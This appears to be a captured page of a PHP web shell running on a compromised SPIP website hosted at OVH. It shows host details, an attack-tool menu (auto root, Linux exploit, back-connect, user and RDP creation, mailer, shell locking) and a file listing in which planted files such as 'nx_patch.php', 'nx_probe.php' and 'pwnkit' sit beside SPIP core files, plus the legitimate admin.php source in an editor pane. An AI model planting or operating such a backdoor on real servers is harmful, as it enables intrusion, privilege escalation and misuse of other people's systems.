Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
Nx_.php
399
B
-rw-rw-rw-
admin.php
2.04
KB
-rw----r--
aiguiller.php
11.59
KB
-rw----r--
assembler.php
25.09
KB
-rw----r--
balises.php
76.06
KB
-rw----r--
boucles.php
3.34
KB
-rw----r--
cacher.php
13.75
KB
-rw----r--
compiler.php
48.79
KB
-rw----r--
composer.php
32.05
KB
-rw----r--
criteres.php
100.89
KB
-rw----r--
debusquer.php
26.84
KB
-rw----r--
decompiler.php
6.3
KB
-rw----r--
evaluer_page.php
2.57
KB
-rw----r--
fonctions.php
20.62
KB
-rw----r--
format_html.php
3.89
KB
-rw----r--
img_cache.php
702
B
-rw-rw-rw-
index.php
2
B
-rw----r--
interfaces.php
6.17
KB
-rw----r--
jointures.php
20.61
KB
-rw----r--
normaliser.php
5.36
KB
-rw----r--
nx_patch.php
523
B
-rw-rw-rw-
nx_probe.php
1.45
KB
-rw-rw-rw-
parametrer.php
10.31
KB
-rw----r--
phraser_html.php
40.03
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
quete.php
19.87
KB
-rw----r--
references.php
32.04
KB
-rw----r--
sandbox.php
7.56
KB
-rw----r--
sitemange.php
4.14
KB
-rw-rw-rw-
styliser.php
5.78
KB
-rw----r--
styliser_par_z.php
13.12
KB
-rw----r--
tracer.php
5.94
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Affichage des boutons d'administration * * @package SPIP\Core\Administration **/ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Ajoute les boutons d'administration de la page s'ils n'y sont pas déjà * * Insère la feuille de style selon les normes, dans le `<head>` * puis les boutons. * * Feuilles de style admin : d'abord la CSS officielle, puis la perso * * @param string $contenu * Contenu HTML de la page qui va être envoyée au navigateur * @return string * Contenu HTML, avec boutons d'administrations et sa CSS **/ function affiche_boutons_admin($contenu) { include_spip('inc/filtres'); // Inserer le css d'admin $css = "<link rel='stylesheet' href='" . url_absolue(direction_css(find_in_path('spip_admin.css'))) . "' type='text/css'>\n"; if ($f = find_in_path('spip_admin_perso.css')) { $css .= "<link rel='stylesheet' href='" . url_absolue(direction_css($f)) . "' type='text/css'>\n"; } ($pos = stripos($contenu, '</head>')) || ($pos = stripos($contenu, '<body>')) || ($pos = 0); $contenu = substr_replace($contenu, $css, $pos, 0); // Inserer la balise #FORMULAIRE_ADMIN, en float $boutons_admin = inclure_balise_dynamique( balise_FORMULAIRE_ADMIN_dyn('spip-admin-float'), false ); ($pos = strripos($contenu, '</body>')) || ($pos = strripos($contenu, '</html>')) || ($pos = strlen($contenu)); $contenu = substr_replace($contenu, $boutons_admin, $pos, 0); return $contenu; }
Close